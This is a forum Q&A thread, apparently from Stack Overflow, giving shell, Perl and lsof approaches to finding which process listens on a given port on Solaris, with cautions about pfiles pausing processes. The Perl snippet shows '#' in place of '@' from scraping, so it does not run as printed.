Updated: I'm talking about generic installs of solaris for which I am not the administrator (although I do have superuser access), so installing things from the freeware disk isn't an option. Obviously neither are using Linux-specific extensions to fuser, netstat, or other tools. So far running pfiles on all processes seems to be the best solution, unfortunately. If that remains the case, I'll probably post an answer with some slightly more efficient code that the clip above.
I found this script somewhere. I don't remember where, but it works for me:
#!/bin/ksh
line='---------------------------------------------'
pids=$(/usr/bin/ps -ef | sed 1d | awk '{print $2}')
if [ $# -eq 0 ]; then
read ans?"Enter port you would like to know pid for: "
else
ans=$1
fi
for f in $pids
do
/usr/proc/bin/pfiles $f 2>/dev/null | /usr/xpg4/bin/grep -q "port: $ans"
if [ $? -eq 0 ]; then
echo $line
echo "Port: $ans is being used by PID:\c"
/usr/bin/ps -ef -o pid -o args | egrep -v "grep|pfiles" | grep $f
fi
done
exit 0
Edit: Here is the original source:
[Solaris] Which process is bound to a given port ?
Here's a one-liner:
ps -ef| awk '{print $2}'| xargs -I '{}' sh -c 'echo examining process {}; pfiles {}| grep 80'
'echo examining process PID' will be printed before each search, so once you see an output referencing port 80, you'll know which process is holding the handle.
Alternatively use:
ps -ef| grep $USER|awk '{print $2}'| xargs -I '{}' sh -c 'echo examining process {}; pfiles {}| grep 80'
Since 'pfiles' might not like that you're trying to access other user's processes, unless you're root of course.
Mavroprovato's answer reports more than only the listening ports. Listening ports are sockets without a peer. The following Perl program reports only the listening ports. It works for me on SunOS 5.10.
#! /usr/bin/env perl
##
## Search the processes which are listening on the given port.
##
## For SunOS 5.10.
##
use strict;
use warnings;
die "Port missing" unless $#ARGV >= 0;
my $port = int($ARGV[0]);
die "Invalid port" unless $port > 0;
my #pids;
map { push #pids, $_ if $_ > 0; } map { int($_) } `ls /proc`;
foreach my $pid (#pids) {
open (PF, "pfiles $pid 2>/dev/null |")
|| warn "Can not read pfiles $pid";
$_ = <PF>;
my $fd;
my $type;
my $sockname;
my $peername;
my $report = sub {
if (defined $fd) {
if (defined $sockname && ! defined $peername) {
print "$pid $type $sockname\n"; } } };
while (<PF>) {
if (/^\s*(\d+):.*$/) {
&$report();
$fd = int ($1);
undef $type;
undef $sockname;
undef $peername; }
elsif (/(SOCK_DGRAM|SOCK_STREAM)/) { $type = $1; }
elsif (/sockname: AF_INET[6]? (.*) port: $port/) {
$sockname = $1; }
elsif (/peername: AF_INET/) { $peername = 1; } }
&$report();
close (PF); }
#!/usr/bin/bash
# This is a little script based on the "pfiles" solution that prints the PID and PORT.
pfiles `ls /proc` 2>/dev/null | awk "/^[^ \\t]/{smatch=\$0;next}/port:[ \\t]*${1}/{print smatch, \$0}{next}"
From Solaris 11.2 onwards you can indeed do this with the netstat command. Have a look here. The -u switch is what you are looking for.
If you are on a lower version of Solaris then - as others have pointed out - the Solaris way of doing this is some kind of script wrapper around pfiles command. Beware though that pfiles command halts the process for a split second in order to inspect it. For 99.9% of processes this is unimportant. Unfortunately we have a process that will give a core dump if it is hit with a pfiles command so we are a bit cautious about using the command. Your situation may be totally different if you are in the 99.9%, meaning you can safely use the pfiles command.
netstat on Solaris will not tell you this, nor will older versions of lsof, but if you download and build/install a newer version of lsof, this can tell you that.
$ lsof -v
lsof version information:
revision: 4.85
latest revision: ftp://lsof.itap.purdue.edu/pub/tools/unix/lsof/
latest FAQ: ftp://lsof.itap.purdue.edu/pub/tools/unix/lsof/FAQ
latest man page: ftp://lsof.itap.purdue.edu/pub/tools/unix/lsof/lsof_man
configuration info: 64 bit kernel
constructed: Fri Mar 7 10:32:54 GMT 2014
constructed by and on: user#hostname
compiler: gcc
compiler version: 3.4.3 (csl-sol210-3_4-branch+sol_rpath)
8<- - - - ***SNIP*** - - -
With this you can use the -i option:
$ lsof -i:22
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
sshd 521 root 3u IPv6 0xffffffff89c67580 0t0 TCP *:ssh (LISTEN)
sshd 5090 root 3u IPv6 0xffffffffa8668580 0t322598 TCP host.domain.com:ssh->21.43.65.87:52364 (ESTABLISHED)
sshd 5091 johngh 4u IPv6 0xffffffffa8668580 0t322598 TCP host.domain.com:ssh->21.43.65.87:52364 (ESTABLISHED)
Which shows you exactly what you're asking for.
I had a problem yesterday with a crashed Jetty (Java) process, which only left 2 files in its /proc/[PID] directory (psinfo & usage).
pfiles failed to find the process (because the date it needed was not there)
lsof found it for me.
You might not want to, but your best bet is to grab the sunfreeware CD and install lsof.
Other than that, yes you can grovel around in /proc with a shell script.
I think the first answer is the best
I wrote my own shell script developing this idea :
#!/bin/sh
if [ $# -ne 1 ]
then
echo "Sintaxis:\n\t"
echo " $0 {port to search in process }"
exit
else
MYPORT=$1
for i in `ls /proc`
do
pfiles $i | grep port | grep "port: $MYPORT" > /dev/null
if [ $? -eq 0 ]
then
echo " Port $MYPORT founded in $i proccess !!!\n\n"
echo "Details\n\t"
pfiles $i | grep port | grep "port: $MYPORT"
echo "\n\t"
echo "Process detail: \n\t"
ps -ef | grep $i | grep -v grep
fi
done
fi
Most probly sun's administrative server..
It's usually bundled along with sun's directory and a few other webmin-ish stuff that is in the default installation
This is sort of an indirect approach, but you could see if a website loads on your web browser of choice from whatever is running on port 80. Or you could telnet to port 80 and see if you get a response that gives you a clue as to what is running on that port and you can go shut it down. Since port 80 is the default port for http traffic chances are there is some sort of http server running there by default, but there's no guarantee.
If you have access to netstat, that can do precisely that.

Resources